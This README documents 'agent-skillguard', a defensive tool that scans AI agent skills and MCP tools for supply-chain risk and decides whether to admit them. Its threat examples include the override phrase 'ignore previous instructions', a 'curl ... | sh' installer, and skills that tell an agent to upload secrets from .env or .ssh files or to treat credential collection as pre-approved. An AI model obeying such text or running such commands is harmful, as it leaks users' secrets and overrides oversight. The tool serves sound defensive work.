Skip to content

Gowrav-M/agent-skillguard

Repository files navigation

Agent SkillGuard

CI Node 22+ License MIT Local first SkillBOM

Policy-as-code admission controller for AI agent skills and MCP tools.

Agent skills are executable supply chain. agent-skillguard creates portable approval evidence: SkillBOM, lockfiles, provenance checks, semantic intent review, SkillSet Attack Graphs, and Skill Passports that show what was reviewed and why it was allowed or blocked.

Agent SkillGuard terminal demo

Agent Trust Suite

flowchart LR
  A["agent-endpoint-doctor"] --> F["agent-trust-center"]
  B["nim-doctor"] --> F
  C["agent-cognicheck"] --> F
  D["agent-skillguard"] --> F
  E["agentops-watchtower"] --> F
  F --> G["one trust report"]
  F --> H["CI gate"]
Loading

SkillGuard contributes skill supply-chain evidence to Agent Trust Center through npx agent-skillguard evidence.

Quickstart

# 1. Run the bundled supply-chain demo
npx agent-skillguard demo

# 2. Detect unsafe skill combinations
npx agent-skillguard graph ./skills

# 3. Create an enterprise approval record
npx agent-skillguard passport ./skills/code-reviewer \
  --source https://github.com/org/repo/tree/main/skills/code-reviewer \
  --commit <sha> \
  --publisher org \
  --pack

Power-user commands remain available:

npx agent-skillguard demo
npx agent-skillguard graph ./skills
npx agent-skillguard intent ./skills
npx agent-skillguard baseline ./skills --reason "initial reviewed risk"
npx agent-skillguard triage ./skills --baseline .skillguard/baseline.json --fail-on high
npx agent-skillguard trust ./skills/code-reviewer --source https://github.com/org/repo/tree/main/skills/code-reviewer --commit <sha>
npx agent-skillguard contract ./skills
npx agent-skillguard admit ./skills
npx agent-skillguard review-update ./approved/skill ./candidate/skill
npx agent-skillguard scan ./skills
npx agent-skillguard pack ./skills/code-reviewer
npx agent-skillguard verify ./code-reviewer.skill.tgz

Why This Exists

Skills for Codex, Claude Code, Cursor, OpenCode, MCP workflows, and internal agents often look like Markdown prompts, but they can include scripts, install hooks, tool descriptors, hidden instructions, and broad permissions. That makes them a new package-management problem.

SkillGuard finds unsafe skill combinations, not just unsafe individual skills.

agent-skillguard is not another skill list and not another agent framework. It is a local-first admission controller for agent skills:

  • Builds a SkillSet Attack Graph that detects cross-skill composition risk.
  • Creates a shareable Skill Passport that combines provenance, scan, semantic intent review, contract, admission, lock, and optional bundle evidence.
  • Runs a Semantic Intent Firewall for payload-less natural-language risks such as compliance-framed secret collection, approval bypass, and skill selection hijacking.
  • Creates auditable risk baselines so teams can accept reviewed existing risk and fail CI only on new or expired risk.
  • Blocks unpinned, mutable, or unapproved skill sources with a provenance firewall.
  • Enforces least-privilege capability contracts from SKILL.md declarations.
  • Finds hidden prompt injection and policy override text in Markdown, YAML, HTML comments, and code blocks.
  • Flags secret exfiltration, credential harvesting, persistence, broad deletes, and download-execute installer chains.
  • Detects risky bundle structure such as symlinks, hidden files, binaries, oversized payloads, and path traversal.
  • Makes ALLOW, REVIEW, or BLOCK admission decisions from policy-as-code.
  • Reviews candidate skill updates for capability drift, new findings, changed instruction surfaces, file drift, and risk-score jumps.
  • Builds a SkillBOM, an SBOM-like inventory for agent skills.
  • Writes skillguard.lock.json with reproducible file hashes and declared capabilities.
  • Packs deterministic .skill.tgz bundles with embedded locks.
  • Emits Markdown, HTML, JSON, and SARIF for local review and GitHub code scanning.

AgentSec Trilogy

Use SkillGuard as the admission-control layer in a broader local-first AgentSec pipeline:

agent-cognicheck      test/red-team MCP tools and skills before approval
agent-skillguard      approve, lock, passport, baseline, and package skills
agentops-watchtower   monitor runtime behavior and preserve incident evidence

One-Command Demo

npx agent-skillguard demo

The demo scans bundled safe and malicious fixtures and writes:

.skillguard/reports/skillguard-report.json
.skillguard/reports/skillguard-report.md
.skillguard/reports/skillguard-report.html
.skillguard/reports/skillguard-report.sarif
.skillguard/reports/skillguard-intent.json
.skillguard/reports/skillguard-intent.md
.skillguard/reports/skillguard-attack-graph.json
.skillguard/reports/skillguard-attack-graph.md
.skillguard/reports/skillguard-attack-graph.html

Report Preview

Area What You See
Summary skills scanned, files inventoried, finding count, risk score
SkillBOM skill names, roots, files, scripts, capabilities
Findings severity, category, target, evidence, recommendation
SARIF GitHub code scanning compatible findings

Example critical finding:

[CRITICAL] Prompt-injection instruction detected
Target: SKILL.md
Evidence: ignore previous instructions and developer messages
Recommendation: remove the instruction and require host policy compliance

Commands

agent-skillguard init
agent-skillguard demo
agent-skillguard passport <skill-dir> --source <uri> [--commit <sha>] [--publisher <name>] [--pack]
agent-skillguard verify-passport <passport-json> [--skill-dir <path>] [--bundle <path>]
agent-skillguard graph <path> [--baseline <path>] [--fail-on high]
agent-skillguard intent <path> [--fail-on high]
agent-skillguard baseline <path> --reason <text> [--expires <date>]
agent-skillguard triage <path> --baseline <path> [--fail-on high]
agent-skillguard policy
agent-skillguard trust <skill-dir> --source <uri> [--commit <sha>] [--publisher <name>] [--write]
agent-skillguard contract <path>
agent-skillguard admit <path> [--require-lock] [--sarif]
agent-skillguard review-update <approved-skill> <candidate-skill>
agent-skillguard scan <path> [--sarif] [--fail-on critical]
agent-skillguard lock <skill-dir>
agent-skillguard pack <skill-dir>
agent-skillguard verify <bundle-or-dir>
agent-skillguard report [--sarif]
agent-skillguard doctor

Threat Examples

  • A skill hides ignore previous instructions inside an HTML comment.
  • An installer runs curl https://example.com/install.sh | sh.
  • A skill tells the agent to read .env, .ssh, or token files and upload secrets.
  • A bundled MCP descriptor grants repository mutation or destructive tool access.
  • A package manifest uses install hooks to run code during setup.
  • A skill changes after review, but the lockfile catches the hash drift.
  • A skill source points to a mutable GitHub branch instead of an immutable commit.
  • A skill has no malware payload but instructs the agent to collect credentials as "compliance evidence" and treat the action as pre-approved.

Skill Passport

A Skill Passport is the enterprise approval record for an AI agent skill:

agent-skillguard passport ./skills/code-reviewer \
  --source https://github.com/org/repo/tree/main/skills/code-reviewer \
  --commit 0123456789abcdef0123456789abcdef01234567 \
  --publisher org \
  --pack

It runs provenance, scan, semantic intent review, capability contract, admission, lock generation, and optional deterministic packaging in one command.

Passport outputs:

.skillguard/passports/<skill-name>/passport.json
.skillguard/passports/<skill-name>/passport.md
.skillguard/passports/<skill-name>/passport.html
.skillguard/passports/<skill-name>/skillguard.lock.json
.skillguard/passports/<skill-name>/<skill-name>.skill.tgz

Use the lower-level commands below when you need to debug one control layer directly.

Verify a passport later:

agent-skillguard verify-passport .skillguard/passports/code-reviewer/passport.json \
  --skill-dir ./skills/code-reviewer \
  --bundle .skillguard/passports/code-reviewer/code-reviewer.skill.tgz

Verification checks passport schema, lock digest, optional current skill digest, optional bundle digest, and embedded decision consistency.

SkillSet Attack Graph

Individual skills can look acceptable while a set of installed skills creates a dangerous chain.

agent-skillguard graph ./skills --fail-on high
flowchart LR
  A["env-reader skill"] --> B["summarizer skill"]
  B --> C["webhook-publisher skill"]
  C --> D["Critical: secret source to external sink"]
Loading

Graph review flags cross-skill paths such as:

  • secret access to network publishing
  • filesystem read to external sink
  • repository read to git write
  • browser automation to external sink
  • approval bypass or selection hijack amplifying high-power tools
  • MCP tool mutation combined with broad capability chains

It writes:

.skillguard/reports/skillguard-attack-graph.json
.skillguard/reports/skillguard-attack-graph.md
.skillguard/reports/skillguard-attack-graph.html

See docs/skillset-attack-graph.md.

Semantic Intent Firewall

Modern malicious skills do not always need obvious scripts or ignore previous instructions strings. A skill can look like ordinary Markdown while pushing the agent toward unsafe behavior at runtime.

agent-skillguard intent ./skills --fail-on high

Intent review flags natural-language behavior risks:

  • compliance or audit language used to justify collecting secrets
  • approval bypass such as "pre-approved" or "do not ask"
  • broad "use this skill for every task" selection hijacking
  • claims that the skill overrides system, developer, user, or policy instructions
  • remote instruction loading from URLs
  • persistent memory, profile, startup, or background behavior

It writes:

.skillguard/reports/skillguard-intent.json
.skillguard/reports/skillguard-intent.md

Real-World Validation

SkillGuard has been smoke-tested against 186 public SKILL.md files across official, community, and adversarial skill repositories. See docs/real-world-validation.md for commands, repository commits, results, and validation-driven rule tuning.

Risk Baselines

Adopting a scanner in a mature repo usually starts with existing review-worthy risk. Baselines let teams accept the current state with a reason, then fail only when new or expired risk appears.

agent-skillguard baseline ./skills --reason "reviewed current vendored skills" --expires 2026-12-31
agent-skillguard triage ./skills --baseline .skillguard/baseline.json --fail-on high

This writes:

.skillguard/baseline.json
.skillguard/reports/skillguard-baseline.md
.skillguard/reports/skillguard-triage.json
.skillguard/reports/skillguard-triage.md

See docs/risk-baselines.md.

Provenance Firewall

A skill can scan clean and still be unsafe to trust if it came from a mutable branch, unknown host, or unapproved publisher. SkillGuard records and evaluates source provenance:

agent-skillguard trust ./skills/code-reviewer \
  --source https://github.com/org/repo/tree/main/skills/code-reviewer \
  --commit 0123456789abcdef0123456789abcdef01234567 \
  --publisher org \
  --write

Trust review writes:

.skillguard/reports/skillguard-trust.json
.skillguard/reports/skillguard-trust.md

With --write, it also records skillguard.provenance.json beside the skill. This gives teams an audit record of what source, publisher, commit, and skill digest were approved.

Capability Contracts

Skills should declare their power before they run. SkillGuard compares declared capabilities in SKILL.md against observed behavior:

agent-skillguard contract ./skills

It blocks undeclared high-risk behavior such as shell execution, network access, filesystem writes, package installs, secret access, git writes, and MCP tool mutation.

Contract review writes:

.skillguard/reports/skillguard-contract.json
.skillguard/reports/skillguard-contract.md

Admission Control

The breakthrough path is governance, not just scanning. Enterprises need to answer one question before a skill enters a project:

Is this skill allowed to run here?

Create a policy:

agent-skillguard policy

Then gate skills:

agent-skillguard admit ./skills --require-lock --sarif

Admission writes:

.skillguard/reports/skillguard-admission.json
.skillguard/reports/skillguard-admission.md

Default policy blocks critical findings, secret access, MCP tool mutation, and unapproved install-script behavior. Teams can tighten this to require clean scans and lockfiles for every approved skill.

Update Firewall

Most supply-chain compromises arrive as updates, not first installs. SkillGuard can compare an approved skill with a candidate replacement:

agent-skillguard review-update ./approved/code-reviewer ./incoming/code-reviewer

It blocks risky drift when the candidate adds dangerous capabilities, introduces new high/critical findings, changes the main SKILL.md instruction surface, or jumps materially in risk score.

Update review writes:

.skillguard/reports/skillguard-update-review.json
.skillguard/reports/skillguard-update-review.md

Compared With Other Tools

Tool Type What It Does SkillGuard Difference
Skill lists Curate useful prompts and workflows Verifies skill safety before install or publish
Agent frameworks Run agents and tools Does not run agents; audits skill supply chain
MCP scanners Inspect MCP tool descriptors Scans skills, scripts, manifests, bundles, locks, and SARIF
OpenSSF Scorecard Scores open-source project security posture Skill-specific admission decisions and SkillBOMs
SLSA/provenance tools Prove build artifact origin Skill-specific source provenance, digest, and trust policy
Permission manifests Describe expected permissions Compares declared permissions to inferred skill behavior
Watchtower Runtime AgentOps and MCP attack-path analysis SkillGuard handles pre-install and pre-publish skill safety

CI Gate

Use Skill Passport in pull requests to retain an approval artifact:

name: skillguard
on: [pull_request]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npx agent-skillguard passport ./skills/code-reviewer --source https://github.com/org/repo/tree/main/skills/code-reviewer --commit ${{ github.sha }} --publisher org

Local Development

npm install
npm run typecheck
npm test
npm run lint
npm run build
node dist/cli.js demo

License

MIT